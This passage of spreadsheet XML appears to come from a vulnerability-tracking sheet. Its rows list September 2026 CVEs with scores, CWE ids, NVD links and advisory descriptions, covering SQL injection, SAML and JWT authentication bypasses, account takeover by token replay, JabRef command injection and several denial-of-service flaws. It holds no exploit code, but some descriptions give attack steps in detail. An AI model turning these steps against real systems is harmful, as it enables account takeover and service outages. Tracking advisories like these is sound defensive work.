      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66630</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66631</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in MC Woocommerce Wishlist &lt;= 1.9.21 versions.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66631</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78425</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Authorised users of outside applications behind the same corporate identity provider (IdP), for example, a wiki, a ticketing system, an expenses tool, or anything they legitimately hold an account on can log into their system via SAML SSO. The IdP issues an assertion to them. If that assertion is presented to NeuVector, NeuVector accepts it because the only thing distinguishing "an assertion for NeuVector" from "an assertion for the wiki" is the element, and the `NotInAudience` warning that reports the mismatch is never read.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78425</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80218</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker holding a sign-in token for one authenticated resource to be signed in as a user of a different resource.
AshAuthentication.Strategy.Password.SignInWithTokenPreparation.extract_primary_keys_from_subject/2 parses the JWT sub claim (for example user?id=1) with URI.parse/1 and keeps only its query string, discarding the path segment that names the subject the token was issued for. Nothing else restores that binding: AshAuthentication.Jwt.verify/3 checks the signature, exp, nbf, jti and the library-version claims, the purpose check only requires sign_in, and the remaining comparison is over primary-key field names, which are identical across resources. The WebAuthn sign-in and remember-me preparations carry copies of the same helper and drop the path in the same way. The magic link sign-in path pins the subject name against the resource and is not affected.
This issue affects ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80218</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82685</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key vulnerability in team-alembic AshAuthentication allows an authenticated attacker to overwrite and confirm another user's email address, and so take over that account. A confirmation token issued to one user is accepted on any other user's record.
AshAuthentication.AddOn.Confirmation.ConfirmChange verifies the token's signature and its act claim, then applies the changes stored against that token to whichever record the changeset targets, never comparing the sub claim against changeset.data. An attacker who registers an account and changes their own email replays the resulting token against a victim's record id, writing in their own address with force_change_attributes/2 and stamping confirmed_at, after which an ordinary password reset yields the account. The library's own confirmation flow is unaffected, because AshAuthentication.AddOn.Confirmation.Actions.confirm/3 resolves sub to a user and targets that record.
This issue affects ash_authentication: from 0.5.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82685</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25275</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing authentication frames with invalid FILS information element header lengths.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25275</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50125</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>MKP is a Model Context Protocol server for Kubernetes. Prior to 0.4.1, cmd/server/main.go exposes the default HTTP endpoint and pkg/mcp/server.go registers the unauthenticated get_resource tool, which accepts attacker-controlled limitBytes and tailLines values for the pods logs subresource. buildPodLogOpts() in pkg/k8s/subresource.go parses those values as unbounded int64 parameters, and defaultGetPodLogs() copies the returned Kubernetes log stream through io.Copy into an in-memory bytes.Buffer without an application-side cap. A remote attacker who can reach the default port 8080 MCP endpoint and select a pod with sufficiently large accumulated logs can send one tools/call request that causes large allocations and additional response copies, while the request-frequency limiter does not constrain per-request volume. This can exhaust process memory, terminate the MKP server, and deny the MCP service; observed testing showed more than one GiB of RSS growth while handling a 128 MiB requested stream. This issue is fixed in version 0.4.1.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50125</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50275</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The Datadog PHP Tracer provides application performance monitoring and distributed tracing for PHP. Prior to 1.19.2, ddtrace_deserialize_baggage in ext/distributed_tracing_headers.c parses incoming W3C baggage HTTP headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES. A remote unauthenticated client can send an arbitrarily large number of comma-separated key-value pairs or a single oversized value, causing the tracer to allocate hash-map entries and consume unbounded CPU and memory on each request. Baggage extraction is enabled by default in most affected deployments unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT. This issue is fixed in version 1.19.2.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50275</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50277</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>dd-trace-cpp is the Datadog distributed tracing library for C++. Prior to 2.1.0, dd-trace-cpp parses incoming W3C baggage headers without enforcing DD_TRACE_BAGGAGE_MAX_ITEMS or DD_TRACE_BAGGAGE_MAX_BYTES on the extraction path, even though those limits are enforced during injection. A remote unauthenticated attacker can send a header containing many comma-separated key-value pairs or one very large value, causing per-request hash-map allocation and unbounded CPU and memory consumption. Baggage extraction is enabled by default in most affected tracers unless baggage is removed from DD_TRACE_PROPAGATION_STYLE or DD_TRACE_PROPAGATION_STYLE_EXTRACT, so affected internet-facing services can be denied service. This issue is fixed in version 2.1.0.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50277</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50285</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-770</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Pomerium is an identity and context-aware access proxy. Prior to 0.32.8, decodeQueryStringV2 in pkg/hpke/url.go performs zstd decompression of attacker-controlled data without an output-memory limit when DecryptURLValues processes HPKE V2 values for Stateless.Callback in internal/authenticateflow/stateless.go. In hosted or stateless authentication deployments, an unauthenticated attacker can obtain the receiver key from /.well-known/pomerium/hpke-public-key, provide a matching attacker-controlled sender key, and send a compressed payload to /.pomerium/callback that expands before validateSenderPublicKey rejects the sender. This can allocate hundreds of megabytes per request, exhaust proxy memory, crash or degrade the process, and block access to applications protected by the deployment. Stateful deployments are not affected because the stateful callback verifies its HMAC signature before decryption and decompression. This issue is fixed in version 0.32.8.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50285</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53534</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>JabRef is a desktop application for managing BibTeX and BibLaTeX libraries. Prior to 6.0-alpha.6, when jabsrv or JabRef's built-in HTTP server is enabled, the GET /better-bibtex/cayw endpoint accepts an external command query parameter and CAYWQueryParams.getCommand() passes it through CAYWResource.getCitation() into PushToSublimeText.getCommandLine(). On Unix-like systems, PushToSublimeText combines this untrusted cite-command prefix and citation keys into a string executed through sh -c by ProcessBuilder without shell escaping. A client that can cause a localhost request with application=sublime can inject shell metacharacters and execute operating-system commands as the JabRef user when a valid Sublime Text command path is configured and the victim completes the CAYW selection dialog. The built-in server is disabled by default, so exploitation requires the victim to enable it or run jabsrv. This issue is fixed in version 6.0-alpha.6.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53534</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54716</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Valhalla is an open source routing engine and accompanying libraries for use with OpenStreetMap data. In 3.7.0 and earlier, a POST request to /sources_to_targets containing an exclude_polygons ring formed by three collinear points can cause unbounded memory growth in the worker. The zero-area geometry, rather than the other request options, triggers processing in src/loki/polygon_search.cc until the process is terminated by the out-of-memory killer. A single unauthenticated request can therefore stop a public-facing worker. Other endpoints that accept exclude_polygons, including /route, were not verified as affected. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54716</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63460</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:vendure/core</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop GraphQL API allows an unauthenticated caller to supply a catastrophically backtracking pattern through StringOperators.regex. packages/core/src/service/helpers/list-query-builder/parse-filter-params.ts passes the raw pattern to the REGEXP implementation registered by packages/core/src/service/helpers/list-query-builder/list-query-builder.ts, and better-sqlite3 and sqljs evaluate it synchronously in the Node.js event loop. ShopProductsResolver.products is publicly reachable, so one nested-quantifier pattern can block request processing and make the storefront and admin API unavailable, while repeated requests can sustain denial of service. PostgreSQL and MySQL or MariaDB deployments do not execute this regular expression in the Node.js event loop. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63460</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68523</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr">
        <is>
          <t>0.19.0</t>
        </is>
      </c>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S177"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77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68523</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68537</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr">
        <is>
          <t>0.26.0</t>
        </is>
      </c>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S178"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version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78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68537</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81481</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
